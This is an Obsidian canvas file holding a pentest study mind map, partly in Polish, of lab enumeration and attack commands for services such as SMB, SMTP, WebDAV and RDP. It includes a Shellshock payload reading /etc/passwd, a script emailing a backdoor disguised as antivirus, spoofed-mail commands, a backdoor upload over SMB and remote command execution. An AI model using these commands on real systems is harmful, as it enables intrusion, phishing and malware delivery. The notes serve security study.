{
	"nodes":[
		{"id":"dcfefe619f24a01d","type":"group","x":-1300,"y":8124,"width":4560,"height":2284,"label":"SMB/NetBIOS service"},
		{"id":"5b952a1e4ba77e00","type":"group","x":-1300,"y":13484,"width":3580,"height":840,"label":"WinRM service"},
		{"id":"ec90a1c5b1e373bf","type":"group","x":-1280,"y":5804,"width":1920,"height":1560,"label":"HTTP service"},
		{"id":"615ea9c87a502671","type":"group","x":-1300,"y":12444,"width":2400,"height":900,"label":"RDP service"},
		{"id":"6f0cd4d51e1826c2","type":"group","x":-1180,"y":2436,"width":2660,"height":760,"label":"SMTP service"},
		{"id":"3f582f4ce88174cf","type":"group","x":-1070,"y":4560,"width":1560,"height":1244,"label":"IIS - WebDAV services"},
		{"id":"76952ae4f0707ac0","type":"group","x":-1162,"y":3340,"width":1942,"height":820,"label":"finger"},
		{"id":"b240454ee1e070c7","type":"group","x":-1300,"y":7504,"width":2440,"height":580,"label":"SNMP service"},
		{"id":"6656494cb6135e90","type":"group","x":-1180,"y":1756,"width":1780,"height":580,"label":"SSH service"},
		{"id":"176d54698fb47d3f","type":"group","x":-1300,"y":11691,"width":1920,"height":449,"label":"MySQL"},
		{"id":"3169619dda9e906b","type":"group","x":-1300,"y":10584,"width":1853,"height":440,"label":"NFS"},
		{"id":"355a01d5b8929ae3","type":"group","x":-1300,"y":11218,"width":1586,"height":342,"label":"Portmapper"},
		{"id":"72cac4feffb7651d","type":"group","x":-760,"y":12500,"width":520,"height":190,"label":"$ msf"},
		{"id":"aa5070063fd94eb5","type":"group","x":-1191,"y":1100,"width":1831,"height":567,"label":"FTP service"},
		{"id":"5ef04a876fbef607","type":"text","text":"# $ ftp\n```bash\n$ ftp <IP> \n> user: anonymous  # anonymous login\n> password: password \n> ftp> ls \n> ftp> get filename.txt\n```","x":-520,"y":1434,"width":403,"height":213},
		{"id":"07b6529fbeffeffd","type":"text","text":"# FTP (T:20,21)\nused to facilitate file sharing between a server and client/clients and vice versa.","x":-1180,"y":1380,"width":400,"height":147},
		{"id":"0d88ef105470d10a","type":"file","file":"mindmapa/tools/Metasploit/msf_ftp.md","x":-520,"y":1307,"width":596,"height":120},
		{"id":"a3615791fe81178e","type":"file","file":"mindmapa/tools/nmap/nmap_ftp.md","x":-520,"y":1120,"width":1040,"height":160},
		{"id":"e1f2694c648bd3a0","type":"text","text":"# WinRM (HTTP: 5985/ HTTPS: 5986)\nWindows Remote Management Protocol - Windows remote management protocol that can be used to facilitate remote access with Windows systems. (Execute commands on remote machine)\nhttps://exploit-notes.hdks.org/exploit/windows/protocol/winrm-pentesting/","x":-1280,"y":13684,"width":560,"height":220},
		{"id":"79a947b88b1fecbd","type":"file","file":"mindmapa/tools/crackmapexec/crackmapexec_winrm.md","x":-420,"y":13781,"width":687,"height":206},
		{"id":"3c79f8a36c9d0d5b","type":"file","file":"mindmapa/tools/evil-WinRM/evil-WinRM.md","x":-460,"y":14006,"width":820,"height":258},
		{"id":"171a1e0ec152519d","type":"file","file":"mindmapa/tools/evil-WinRM/evil-WinRM passthehash.md","x":720,"y":13884,"width":817,"height":122},
		{"id":"66cb93ad49805438","type":"file","file":"mindmapa/tools/evil-WinRM/evil-WinRM file transfer.md","x":720,"y":14040,"width":802,"height":174},
		{"id":"37b74ef3657af659","type":"text","text":"# $ mount\n```bash\n$ mkdir </media/mount/dir> # Create a local mount point.\n$ mount -t cifs \\\\\\\\<IP>\\\\<resource_name> </media/mount/dir> # mount SMB share in Linux, like net use\n$ mount -o username=<username>,password=<password> -t ... \n```","x":620,"y":8174,"width":1300,"height":170},
		{"id":"84df055fb2d60570","type":"file","file":"mindmapa/tools/nmap/nmap_smb.md","x":620,"y":9200,"width":1060,"height":294},
		{"id":"59caeca0f4661112","type":"file","file":"mindmapa/protocols/NetBIOS.md","x":-1240,"y":9384,"width":840,"height":760},
		{"id":"83dfb88d3b8a82d3","type":"text","text":"# Zasoby automatycznie udostępniane przez Windows\n- **ADMIN$:** Udostępnia dostęp do katalogu systemowego (zazwyczaj `C:\\Windows`) na zdalnym komputerze. Jest to zasób, który ułatwia administrację systemem. **Przykład użycia:** Umożliwia zdalne zarządzanie plikami i folderami w katalogu systemowym, zdalne instalacje oprogramowania itp.\n- **IPC$ (Inter-Process Communication):** umożliwia komunikację międzyprocesową (Inter-Process Communication) między komputerami. Jest to zasób używany do przekazywania informacji między procesami na zdalnym komputerze. **Przykład użycia:** Umożliwia zdalne wykonywanie poleceń i inne operacje, które wymagają komunikacji międzyprocesowej.\n- **C$:** Udostępnia dostęp do dysku C na zdalnym komputerze. Jest to zasób, który umożliwia zdalne zarządzanie zawartością dysku C, w tym przeglądanie, kopiowanie plików, zdalne instalacje oprogramowania, i inne operacje administracyjne. **Przykład użycia:** Pozwala na zdalne przeglądanie, zarządzanie i manipulację plikami i folderami na dysku C zdalnego komputera.","x":-1060,"y":8984,"width":760,"height":360},
		{"id":"f9fb795ded8f4052","type":"text","text":"# psexec","x":-215,"y":9244,"width":250,"height":70},
		{"id":"a6209b114ccc682f","type":"text","text":"# $ enum4linux\nTool for enumerating information from Windows and Samba systems.  \nWrapper around rpcclient, net, nmblookup, smbclient\n```bash\n$ enum4linux <IP> # enumerating basic NetBIOS/SMB information\n$ enum4linux <IP> -v # enumerating basic NetBIOS/SMB information verbose mode, show commands that runs\n$ enum4linux <IP> -a# enumerating all simple NetBIOS/SMB information\n$ enum4linux <IP> -u <user> -p <passwd># log as user and enumerate NetBIOS/SMB information\n```","x":1820,"y":8548,"width":1020,"height":256},
		{"id":"9f5b2d11782c05b9","type":"text","text":"# $ smbclient\n```bash\n$ smbclient -L <IP> # list all shares from <IP>, Anonymous login\n$ smbclient -L <IP> -N # List all available shares on the samba server, no password\n$ smbclient \\\\\\\\<IP>\\\\<share> # connect to share with NULL session, >password: press Enter\n$ smbclient \\\\\\\\<IP>\\\\\\\\<share> -U <user> # connect to share, check if share exist\n$ smbclient \\\\\\\\<IP>\\\\<share> -U <user> -N # connect to share, no password provided\n$ smbclient \\\\\\\\<IP>\\\\<share> -U <user> [--password=<passwd>] # connect to share, as user, use password\n$ smbclient \\\\\\\\<IP>\\\\<share> -U <user> [--pw-nt-hash=<NT_hash>] # connect to share, as user, use NT Hash\n```","x":1820,"y":8824,"width":1120,"height":256},
		{"id":"05eee1a18ed5507b","type":"text","text":"# $ smbmap\n\nSamba Share Enumerator\n\n```bash\n$ smbmap -u <user> -p \"\" -d . -H <IP> # discover all shared folders and drives jako gość (domyślne konto)\n$ smbmap -u <user> -p <passwd> -H <IP># pokazuje zasoby i jakie ma uprawnienia do nich użytkownik\n$ smbmap -u <user> -p <passwd> -H <IP> -d . # jak wyżej ale jako odpowiedni użytkownik\n$ smbmap -u <user> -p <passwd> -H <IP> -x 'ipconfig' # execute command on the target machine\n$ smbmap -u <user> -p <passwd> -H <IP> -L # Listing all drives on the specified host\n$ smbmap -u <user> -p <passwd> -H <IP> -r 'C$' # List contents of the directory of C:\\ drive\n$ smbmap -u <user> -p <passwd> -H <IP> --upload '/root/kali/backdor' 'C$\\backdor' # Uploading a sample file\n$ smbmap -u <user> -p <passwd> -H <IP> -download 'C$\\flag.txt' # Downloading a sample file\n```","x":1800,"y":9413,"width":1055,"height":351},
		{"id":"137f43619df7a1c5","type":"file","file":"mindmapa/tools/crackmapexec/crackmapexec_smb.md","x":860,"y":8346,"width":920,"height":330},
		{"id":"26b22c168eac83b4","type":"file","file":"mindmapa/tools/Metasploit/msf_smb.md","x":620,"y":9533,"width":560,"height":270},
		{"id":"ee127de62a87e517","type":"text","text":"# $ rpcclient\nhttps://www.hackingarticles.in/active-directory-enumeration-rpcclient/\n```bash\n$ rpcclient -N -U \"\" <IP> # connect to <IP> using NetBIOS/SMB/RPC; null session, \n$ rpcclient -U [<domain/>]<user>[<%passwd>] <IP> # NetBIOS/SMB login to host\n$ rpcclient <commands>help, enumdomusers,enumdomgroups, lookupnames <user>,anumalsgroups, srvinfo, queryuser, enumprivs # usefull commands after logging in\n```","x":1820,"y":9124,"width":1220,"height":260},
		{"id":"22247ff212d21755","type":"text","text":"# Null sesion attack\na malicious user can establish connection to a Windows system without providing any username or password. Connection must be stablished to administrative share `IPC$`.\n```PowerShell\nC:\\> net use \\\\<IP>\\IPC$ \"\" /u:\"\" # NetBIOS/SMB Null session attack\n```","x":-390,"y":9764,"width":460,"height":460},
		{"id":"a8724ff26c686ab7","type":"file","file":"mindmapa/tools/Metasploit/msf_psexec.md","x":295,"y":9871,"width":565,"height":273},
		{"id":"6bfacf79fbfa8f1c","type":"file","file":"mindmapa/tools/impacket/impacket_psexec_smbexec.md","x":160,"y":10160,"width":660,"height":168},
		{"id":"ebcbb3bf478824db","type":"text","text":"# $ nmblookup\n\n```bash\n# NetBIOS over TCP/IP client used to lookup NetBIOS names\n$ nmblookup -A <IP>\n```","x":-1165,"y":10224,"width":690,"height":160},
		{"id":"3fcb2b57fa20a16a","type":"text","text":"# NFS (T:2049/UDP:2049)\nNetwork File System\nRPC-based file sharing protocol often found configured on Unix-like systems, is typically used to provide access to shared resources, and can be found listening on TCP and/or UDP port 2049.\nSince NFS is an RPC-based service and relies on other RPC services, such as “mountd,” it should be directly queried via the Portmapper service which is found on port TCP and/or UDP 111 when using Nmap NSE scripts for instance.","x":-1280,"y":10604,"width":610,"height":316},
		{"id":"c5be1017c77df9a0","type":"text","text":"# $ nmap \n```bash\nnmap --script rpc-grind,rpcinfo <IP> –p 111\n```","x":-280,"y":11238,"width":546,"height":143},
		{"id":"e9d65cec2b6ba0b8","type":"text","text":"# Portmapper (rpcbind) (TCP/UDP:111, TCP/UDP:32771)\nPortmapper is typically found listening on ports  and in some cases, ports , and can be enumerated using Nmap NSE scripts, or by using the built-in “rpcinfo” command. ","x":-1280,"y":11244,"width":860,"height":160},
		{"id":"6638f34acdbd35be","type":"text","text":"# $ rpcinfo\n```bash\nrpcinfo -p 192.168.13.26\n```","x":-280,"y":11404,"width":433,"height":136},
		{"id":"cdbe3ca3daa8d98a","type":"text","text":"# $ nmap\n```bash\n$ nmap --script nfs-ls,nfs-showmount,nfs-statfs <IP> # Acces Rights, Available Export Directory Listings, Available Export\n```","x":-547,"y":10654,"width":1080,"height":150},
		{"id":"088c684b102c59ce","type":"text","text":"# $ mount\n```bash\n$ mount -t nfs <NFS Server IP>:/home/bob /mnt/home/bob -o nolock # mount the available exported directories to /mnt//home/bob\n```","x":-547,"y":10814,"width":1080,"height":130},
		{"id":"c07c8d0afb0212fd","type":"text","text":"# MySQL (T:3306)","x":-1280,"y":11760,"width":400,"height":80},
		{"id":"ef2b1d0f0e397e92","type":"text","text":"# $ mysql\n```bash\n$ mysql -h <IP> -u <user> -p <passwd> \n$ mysql -h <IP> -u root -p <passwd> \n```","x":-632,"y":11916,"width":452,"height":185},
		{"id":"2d2cd080a6ba7aeb","type":"text","text":"# $ msf - mysql_login","x":-660,"y":11780,"width":404,"height":85},
		{"id":"5ba7f98df52fd958","type":"text","text":"# $ msf -mysql_udf_payload\n```bash\nmsf> use exploit/multi/mysql/mysql_udf_payload \nmsf> set FORCE_UDF_UPLOAD true\n```","x":-60,"y":11836,"width":529,"height":173},
		{"id":"19e755d9bb4ede7e","type":"text","text":"# $ msf - BlueKeep(vulnerability)","x":-740,"y":12580,"width":460,"height":100},
		{"id":"7ecc43d1128ec857","type":"file","file":"mindmapa/tools/xfreerdp/xfreerdp.md","x":-720,"y":12720,"width":660,"height":191},
		{"id":"cc1a042dde5e293c","type":"file","file":"mindmapa/tools/xfreerdp/xfreerdp_passthehash.md","x":160,"y":12580,"width":920,"height":344},
		{"id":"a0432fb6fb646752","type":"text","text":"# $ msf - rdp_scanner","x":-740,"y":12520,"width":340,"height":60},
		{"id":"02e20d80f1c173f3","type":"text","text":"# RDP (T:3389)\nRemote Desktop Protocol - Proprietary GUI remote access protocol developed by Microsoft and is used to remotely authenticate and interact with a Windows system.","x":-1280,"y":12600,"width":400,"height":180},
		{"id":"ce467c6a5dc9f314","type":"text","text":"# $ rdesktop\n```bash\n$ rdesktop <IP> –u <user> –p <passwd>\n```","x":-1210,"y":12911,"width":390,"height":133},
		{"id":"41b140a2f6d2996b","type":"text","text":"# $ msf - mysql_enum","x":-60,"y":11720,"width":390,"height":60},
		{"id":"1cae2656738d720b","type":"file","file":"mindmapa/tools/hydra/hydra_rdp.md","x":-720,"y":12984,"width":800,"height":300},
		{"id":"1dbf99a46ed130c2","type":"file","file":"mindmapa/tools/hydra/hydra_ssh.md","x":-600,"y":2236,"width":420,"height":50},
		{"id":"44d7b3a21ad2c749","type":"file","file":"mindmapa/tools/nmap/nmap_ssh.md","x":-599,"y":1776,"width":1020,"height":220},
		{"id":"eb19960bac2334b3","type":"file","file":"mindmapa/tools/Metasploit/msf_ssh.md","x":-600,"y":2036,"width":1100,"height":180},
		{"id":"1edf5a47125dd2a0","type":"text","text":"# SSH (T:22)\nSSH (Secure Shell) - SSH is a cryptographic remote access protocol that is used to remotely access and control systems over an unsecured network. SSH was developed as a secure successor to telnet.","x":-1160,"y":1927,"width":400,"height":209},
		{"id":"c060b94e13859d4a","type":"text","text":"# $ finger\n```bash\n$ finger root@demo3.ine.local\n```","x":60,"y":3360,"width":548,"height":140},
		{"id":"cf009e78081e5d6b","type":"file","file":"mindmapa/tools/Metasploit/msf_winrm.md","x":-420,"y":13521,"width":680,"height":240},
		{"id":"c0405c81544814d5","type":"file","file":"mindmapa/tools/crackmapexec/crackmapexec_passthehash.md","x":720,"y":13641,"width":660,"height":200},
		{"id":"50e5634d811ba130","type":"file","file":"mindmapa/tools/hydra/hydra_webdav.md","x":-240,"y":4580,"width":600,"height":160},
		{"id":"a11058f7a4e4cda7","type":"text","text":"# $ davtest\n\nDavtest is a WebDAV scanner that sends exploit files to the WebDAV server and automatically creates the directory and uploads different format types of files. The tool also tried to execute uploaded files and gives us an output of successfully executed files.\n\n```bash\n$ davtest -url http://10.0.16.177/webdav\n$ davtest -auth bob:password_123321 -url http://10.0.16.177/webdav\n```","x":-240,"y":4740,"width":660,"height":240},
		{"id":"121d120e5c92667e","type":"text","text":"# SCANNING SERVICES","x":-4100,"y":5876,"width":500,"height":165,"color":"1"},
		{"id":"f9c58e42eb6e05bd","type":"text","text":"MSSQL (T:1433)","x":-3980,"y":6236,"width":400,"height":60},
		{"id":"eb58e2bf1cef99a7","type":"text","text":"# IIS - WebDAV (T:80/443)\nMicrosoft IIS (Internet Information Services) - Proprietary web server software developed by Microsoft that runs on Windows.  \nWebDAV (Web Distributed Authoring & Versioning) - HTTP extension that allows clients to update, delete, move and copy files on a web server. WebDAV is used to enable a web server to act as a file server.  \nSprawdzić nagłówkiem `HTTP OPTION` jakie opcje są dostępne  \nSupported executable file extensions: `.asp`, `.aspx`, `.config`, `.php`","x":-1000,"y":4860,"width":480,"height":320},
		{"id":"705a7f097377a2d4","type":"text","text":"Apache Tomcat (T:8080)","x":-4500,"y":6216,"width":400,"height":50},
		{"id":"f2104410a1f734c8","type":"text","text":"# $ msf_finger\n```bash\nuse auxiliary/scanner/finger/finger_users\n```","x":60,"y":3530,"width":548,"height":130},
		{"id":"fc9ecd681f1bf8b5","type":"text","text":"# $ finger-user-enum.pl\n```bash\n.../finger-user-enum.pl -U <user_worlist> -t <target>\n```","x":-11,"y":3793,"width":771,"height":147},
		{"id":"7ea07dac85e70ea5","type":"text","text":"# finger (T:79)\nThe Name/Finger protocol and the Finger user information protocol are simple network protocols for the exchange of human-oriented status and user information. The finger daemon runs on TCP port 79. The client will (in the case of remote hosts) open a connection to port 79. An RUIP (Remote User Information Program) is started on the remote end of the connection to process the request. The local host sends the RUIP one line query based upon the Finger query specification, and waits for the RUIP to respond. The RUIP receives and processes the query, returns an answer, then initiates the close of the connection. The local host receives the answer and the close signal, then proceeds to close its end of the connection. **Source:** https://en.wikipedia.org/wiki/Finger_(protocol)","x":-1142,"y":3530,"width":765,"height":340},
		{"id":"b198fb6f4b7f56fe","type":"text","text":"# HTTP file server (T:80)","x":-1740,"y":6440,"width":400,"height":80},
		{"id":"768cdafe36159abe","type":"text","text":"# $ http\n\n```bash\n$ http <IP>\n```","x":-500,"y":6324,"width":220,"height":120},
		{"id":"d0c34079735d59ef","type":"text","text":"# HTTP web server (T:80)\n","x":-1260,"y":6184,"width":480,"height":220},
		{"id":"ec34d06360c66048","type":"file","file":"mindmapa/tools/nmap/nmap_smtp.md","x":-320,"y":7524,"width":1440,"height":240},
		{"id":"3301c696b9267540","type":"text","text":"# $ browsh\n\n```bash\n$ browsh --startup-url http://10.0.29.163/Default.aspx\n```","x":-500,"y":6464,"width":360,"height":200},
		{"id":"c395828f2412ecfe","type":"file","file":"mindmapa/tools/nmap/nmap_shellshock.md","x":-270,"y":6740,"width":800,"height":200},
		{"id":"44eb844cdfbaf594","type":"text","text":"# Shellshock\n\n```bash\ncurl -H \"user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'\" \\\nhttp://localhost:8080/cgi-bin/vulnerable\n```","x":-830,"y":6860,"width":440,"height":240},
		{"id":"086c04609b813a8d","type":"file","file":"mindmapa/tools/Metasploit/msf_shellshock.md","x":-270,"y":6980,"width":720,"height":200},
		{"id":"ef4f592352746bcf","type":"text","text":"# $ whatweb\n\n```bash\n$ whatweb <IP>\n```","x":-500,"y":6144,"width":260,"height":160},
		{"id":"63d2b07eaf61abdf","type":"file","file":"mindmapa/tools/cadaver/WebDAV.md","x":-240,"y":5000,"width":760,"height":360},
		{"id":"7e9b55400f9f617f","type":"file","file":"mindmapa/tools/Metasploit/msf_webdav.md","x":-240,"y":5380,"width":760,"height":364},
		{"id":"782bc7c85a17c2a5","type":"text","text":"# SNMP (T:161;U:161)\n**Simple Network Management Protocol**\n\npobrać snmp-mibs-downloader i zainstalować comment out 4th line in /etc/snmp/snmp.conf","x":-1280,"y":7724,"width":560,"height":200},
		{"id":"5de23563c3e7e487","type":"file","file":"mindmapa/tools/snmpwalk/snmpwalk.md","x":-320,"y":7804,"width":1060,"height":160},
		{"id":"47adb36f3add2a50","type":"text","text":"# $ snmpset","x":-320,"y":7964,"width":250,"height":60},
		{"id":"1a7b8a24c0e71e8c","type":"file","file":"mindmapa/tools/Metasploit/msf_http.md","x":-500,"y":5824,"width":760,"height":300},
		{"id":"fff5755fb62b1673","type":"text","text":"# SMTP (T:25/465/587)\nSimple Mail Transfer Protocol","x":-1160,"y":2716,"width":400,"height":100},
		{"id":"478fd974bea326a8","type":"text","text":"# python, send the malicious email to the `bob@ine.local.`\nhttps://www.geeksforgeeks.org/send-mail-attachment-gmail-account-using-python/\n```python\nimport smtplib\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.text import MIMEText\nfrom email.mime.base import MIMEBase\nfrom email import encoders\nfromaddr = \"attacker@fake.net\"\ntoaddr = \"bob@ine.local\"  \n# instance of MIMEMultipart\nmsg = MIMEMultipart()\n# storing the senders email address  \nmsg['From'] = fromaddr\n# storing the receivers email address \nmsg['To'] = toaddr\n# storing the subject \nmsg['Subject'] = \"Subject of the Mail\"\n# string to store the body of the mail\nbody = \"Body_of_the_mail\"\n# attach the body with the msg instance\nmsg.attach(MIMEText(body, 'plain'))\n# open the file to be sent \nfilename = \"Free_AntiVirus.exe\"\nattachment = open(\"/root/backdoor.exe\", \"rb\")\n# instance of MIMEBase and named as p\np = MIMEBase('application', 'octet-stream')\n# To change the payload into encoded form\np.set_payload((attachment).read())\n# encode into base64\nencoders.encode_base64(p)\np.add_header('Content-Disposition', \"attachment; filename= %s\" % filename)\n# attach the instance 'p' to instance 'msg'\nmsg.attach(p)\n# creates SMTP session\ns = smtplib.SMTP('demo.ine.local', 25)\n# Converts the Multipart msg into a string\ntext = msg.as_string()\n# sending the mail\ns.sendmail(fromaddr, toaddr, text)\n# terminating the session\ns.quit()\n```","x":140,"y":2469,"width":1120,"height":297},
		{"id":"4668ce2cdf52033a","type":"text","text":"# $ nmap \n```bash\n$ nmap --script smtp-commands <IP> -p 25 # gather the Extended commands supported by an SMTP server\n```","x":-1160,"y":3000,"width":627,"height":175},
		{"id":"f88bcc261ef84047","type":"text","text":"# $ smtp-user-enum \n```bash\n$ smtp-user-enum -M VRFY -U users.txt -t <IP> \n$ smtp-user-enum -M EXPN -u adminl -t <IP>1 \n$ smtp-user-enum -M RCPT -U users.txt -T mail-server-ips.txt \n$ smtp-user-enum -M EXPN -D example.com -U users.txt -t <IP>\n```","x":-487,"y":2960,"width":627,"height":215},
		{"id":"796e7c1bca5c785e","type":"file","file":"mindmapa/tools/Metasploit/msf_smtp.md","x":-460,"y":2436,"width":560,"height":160},
		{"id":"d7cc82821064fd7d","type":"text","text":"```bash\n$ telnet <target_IP> 25\nHELO attacker.xyz\nmail from: admin@attacker.xyz\nrcpt to:root@openmailbox.xyz\ndata\nSubject: Hi Root\nHello,\nThis is a fake mail sent using telnet command.\nFrom,\nAdmin\n.\n# There is a dot(.) in the last line which indicates the termination of data.\n```","x":760,"y":2766,"width":560,"height":240},
		{"id":"5e1a0de945d2d11f","type":"text","text":"# $ sendmail\n```bash\n$ sendemail -f admin@attacker.xyz -t root@openmailbox.xyz -s 192.26.29.3 -u Fakemail -m \"Hi root, a fake from admin\" -o tls=no\n```","x":540,"y":2960,"width":600,"height":200},
		{"id":"bd628c3de238ad15","type":"text","text":"# SMB (T:445)\nSMB/CIFS (Server Message Block Protocol) - (czasem oparty na protokole NetBIOS) Network file sharing protocol that is used to facilitate the sharing of files and peripherals between computers on a local network (LAN).","x":-1280,"y":8400,"width":560,"height":160},
		{"id":"896a36dee9e0dd64","x":-820,"y":8560,"width":660,"height":240,"type":"text","text":"# shares in windows\n```Powershell\ncmd> net share ABC=C:/... # create share\ncmd> net share /delete ABC # stop share\n# mount shared folder\ncmd> net use Z: \\\\DEVICE-NAME-OR-IP\\SHARED-FOLDER PASSWORD /user:USERNAME /persistent:yes\ncmd> net use X: \\\\<server>\\<share_folder>\n# unmount share\ncmd> net use * /Delete\ncmd> net use X: /Delete\n```"}
	],
	"edges":[
		{"id":"42515e935c3a3ebb","fromNode":"121d120e5c92667e","fromSide":"right","toNode":"07b6529fbeffeffd","toSide":"left"},
		{"id":"88c4ef551ebaa2fe","fromNode":"121d120e5c92667e","fromSide":"right","toNode":"1edf5a47125dd2a0","toSide":"left"},
		{"id":"0fe6dfcf946aea82","fromNode":"121d120e5c92667e","fromSide":"right","toNode":"fff5755fb62b1673","toSide":"left"},
		{"id":"6b1c4c1b0e92861a","fromNode":"121d120e5c92667e","fromSide":"right","toNode":"eb58e2bf1cef99a7","toSide":"left"},
		{"id":"18d81dc52fc38e5b","fromNode":"121d120e5c92667e","fromSide":"right","toNode":"d0c34079735d59ef","toSide":"left"},
		{"id":"120cc15f8a576b8c","fromNode":"121d120e5c92667e","fromSide":"right","toNode":"b198fb6f4b7f56fe","toSide":"left"},
		{"id":"0e3ea014f46930d7","fromNode":"121d120e5c92667e","fromSide":"right","toNode":"782bc7c85a17c2a5","toSide":"left"},
		{"id":"f11cb1b687c93b2a","fromNode":"121d120e5c92667e","fromSide":"right","toNode":"bd628c3de238ad15","toSide":"left"},
		{"id":"9dbc1f0d7f5f631c","fromNode":"121d120e5c92667e","fromSide":"right","toNode":"f9c58e42eb6e05bd","toSide":"left"},
		{"id":"9158a32f6f5b2311","fromNode":"121d120e5c92667e","fromSide":"right","toNode":"c07c8d0afb0212fd","toSide":"left"},
		{"id":"89737c9273ab54a5","fromNode":"121d120e5c92667e","fromSide":"right","toNode":"02e20d80f1c173f3","toSide":"left"},
		{"id":"59278ff1c9954bae","fromNode":"121d120e5c92667e","fromSide":"right","toNode":"e1f2694c648bd3a0","toSide":"left"},
		{"id":"b1ef3a499ff2ad7f","fromNode":"121d120e5c92667e","fromSide":"right","toNode":"705a7f097377a2d4","toSide":"left"},
		{"id":"721b3c5d089a89ab","fromNode":"07b6529fbeffeffd","fromSide":"right","toNode":"a3615791fe81178e","toSide":"left","label":"$ nmap"},
		{"id":"c254f685f4b8f3ec","fromNode":"07b6529fbeffeffd","fromSide":"right","toNode":"0d88ef105470d10a","toSide":"left","label":"$ msf"},
		{"id":"41c8fdd79249f27e","fromNode":"07b6529fbeffeffd","fromSide":"right","toNode":"5ef04a876fbef607","toSide":"left","label":"$ ftp"},
		{"id":"85220bf75078cd85","fromNode":"1edf5a47125dd2a0","fromSide":"right","toNode":"44d7b3a21ad2c749","toSide":"left","label":"$ nmap"},
		{"id":"b37568f9f13596c4","fromNode":"1edf5a47125dd2a0","fromSide":"right","toNode":"1dbf99a46ed130c2","toSide":"left","label":"$ hydra"},
		{"id":"02f6566a92c5ecdd","fromNode":"1edf5a47125dd2a0","fromSide":"right","toNode":"eb19960bac2334b3","toSide":"left","label":"$ msf"},
		{"id":"a9b5f779b26daf0f","fromNode":"fff5755fb62b1673","fromSide":"right","toNode":"796e7c1bca5c785e","toSide":"left","label":"$ msf"},
		{"id":"2f1269d09c74f27d","fromNode":"fff5755fb62b1673","fromSide":"right","toNode":"d7cc82821064fd7d","toSide":"left","label":"send fake mail with telnet"},
		{"id":"efbd770e3c94c3df","fromNode":"fff5755fb62b1673","fromSide":"right","toNode":"5e1a0de945d2d11f","toSide":"left","label":"$ sendmail"},
		{"id":"1d212fdee499a9cf","fromNode":"eb58e2bf1cef99a7","fromSide":"right","toNode":"50e5634d811ba130","toSide":"left","label":"$ hydra"},
		{"id":"5102c649a4ee2c1c","fromNode":"eb58e2bf1cef99a7","fromSide":"right","toNode":"a11058f7a4e4cda7","toSide":"left","label":"$ davtest"},
		{"id":"4e69604802a64bab","fromNode":"eb58e2bf1cef99a7","fromSide":"right","toNode":"63d2b07eaf61abdf","toSide":"left","label":"$ cadevar"},
		{"id":"e09f1660bb07d62a","fromNode":"eb58e2bf1cef99a7","fromSide":"right","toNode":"7e9b55400f9f617f","toSide":"left","label":"$ msf"},
		{"id":"2083cb5dbc5e2e2f","fromNode":"d0c34079735d59ef","fromSide":"right","toNode":"ef4f592352746bcf","toSide":"left","label":"$ whatweb"},
		{"id":"5df781256605b5c6","fromNode":"d0c34079735d59ef","fromSide":"right","toNode":"768cdafe36159abe","toSide":"left","label":"$ http"},
		{"id":"9af62070d5251e62","fromNode":"d0c34079735d59ef","fromSide":"right","toNode":"3301c696b9267540","toSide":"left","label":"$ browsh"},
		{"id":"8d935614b4f3cdd8","fromNode":"d0c34079735d59ef","fromSide":"right","toNode":"1a7b8a24c0e71e8c","toSide":"left","label":"$ msf"},
		{"id":"a6233812878339ee","fromNode":"44eb844cdfbaf594","fromSide":"right","toNode":"c395828f2412ecfe","toSide":"left","label":"$ nmap"},
		{"id":"a542c3d4a39b428b","fromNode":"44eb844cdfbaf594","fromSide":"right","toNode":"086c04609b813a8d","toSide":"left","label":"$ msf"},
		{"id":"98f1b5103ae5de64","fromNode":"d0c34079735d59ef","fromSide":"right","toNode":"44eb844cdfbaf594","toSide":"left","label":"Apache Web Server (T:80/443)"},
		{"id":"f0dcb69969bb00ae","fromNode":"782bc7c85a17c2a5","fromSide":"right","toNode":"5de23563c3e7e487","toSide":"left","label":"$ snmpwalk"},
		{"id":"33ae7a33a0cd7ee1","fromNode":"782bc7c85a17c2a5","fromSide":"right","toNode":"ec34d06360c66048","toSide":"left","label":"$ nmap"},
		{"id":"3fd31f70f605c616","fromNode":"782bc7c85a17c2a5","fromSide":"right","toNode":"47adb36f3add2a50","toSide":"left","label":"$ snmpset"},
		{"id":"133ea7e144e48509","fromNode":"bd628c3de238ad15","fromSide":"bottom","toNode":"83dfb88d3b8a82d3","toSide":"top"},
		{"id":"777c3c0acada1f7b","fromNode":"bd628c3de238ad15","fromSide":"bottom","toNode":"59caeca0f4661112","toSide":"left"},
		{"id":"4232fc614ce5adf0","fromNode":"bd628c3de238ad15","fromSide":"right","toNode":"37b74ef3657af659","toSide":"left","label":"$ mount.cisf"},
		{"id":"a598cfdbb1ad99eb","fromNode":"bd628c3de238ad15","fromSide":"right","toNode":"a6209b114ccc682f","toSide":"left","label":"$ enum4linux"},
		{"id":"1737baf4cd61cf8f","fromNode":"bd628c3de238ad15","fromSide":"right","toNode":"9f5b2d11782c05b9","toSide":"left","label":"$ smbclient"},
		{"id":"946bfa5b17d77801","fromNode":"bd628c3de238ad15","fromSide":"right","toNode":"ee127de62a87e517","toSide":"left","label":"$ rpcclient"},
		{"id":"5e2020de02f3abe0","fromNode":"bd628c3de238ad15","fromSide":"right","toNode":"84df055fb2d60570","toSide":"left","label":"$ nmap"},
		{"id":"81ab59e8a1322df8","fromNode":"bd628c3de238ad15","fromSide":"right","toNode":"26b22c168eac83b4","toSide":"left","label":"$ msf"},
		{"id":"ba2ce72231a7660b","fromNode":"f9fb795ded8f4052","fromSide":"right","toNode":"a8724ff26c686ab7","toSide":"top","label":"$ msf"},
		{"id":"9fc0163d51f21dca","fromNode":"f9fb795ded8f4052","fromSide":"bottom","toNode":"6bfacf79fbfa8f1c","toSide":"top","label":"$ impacket"},
		{"id":"8d12e20183779c40","fromNode":"59caeca0f4661112","fromSide":"bottom","toNode":"ebcbb3bf478824db","toSide":"top","label":"$ nmblookup"},
		{"id":"fea37b0c3f8e12d3","fromNode":"02e20d80f1c173f3","fromSide":"right","toNode":"72cac4feffb7651d","toSide":"left","label":"$ msf"},
		{"id":"828b9c4ac068f334","fromNode":"02e20d80f1c173f3","fromSide":"right","toNode":"7ecc43d1128ec857","toSide":"left","label":"$ xfreerdp"},
		{"id":"a0d35af007b61692","fromNode":"7ecc43d1128ec857","fromSide":"right","toNode":"cc1a042dde5e293c","toSide":"left","label":" passthehash"},
		{"id":"98bba66f145acdd1","fromNode":"e1f2694c648bd3a0","fromSide":"right","toNode":"cf009e78081e5d6b","toSide":"left","label":"$ msf"},
